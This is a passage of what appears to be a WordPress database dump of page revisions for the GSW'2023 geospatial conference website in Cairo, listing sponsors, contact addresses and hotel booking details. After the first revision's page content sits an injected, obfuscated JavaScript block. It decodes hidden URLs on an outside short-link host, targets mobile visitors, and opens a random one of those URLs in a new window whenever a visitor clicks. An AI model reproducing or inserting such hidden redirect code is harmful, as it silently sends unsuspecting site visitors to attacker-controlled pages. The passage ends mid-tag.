link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-07-10 01:05:55','2023-07-10 01:05:55','',3066,'https://gsw2023.com/?p=4994',0,'revision','',0),
(4995,1,'2023-07-10 01:09:09','2023-07-10 01:09:09','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951146401{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951344645{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 size-full\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"160\" height=\"190\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1687571540500{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" 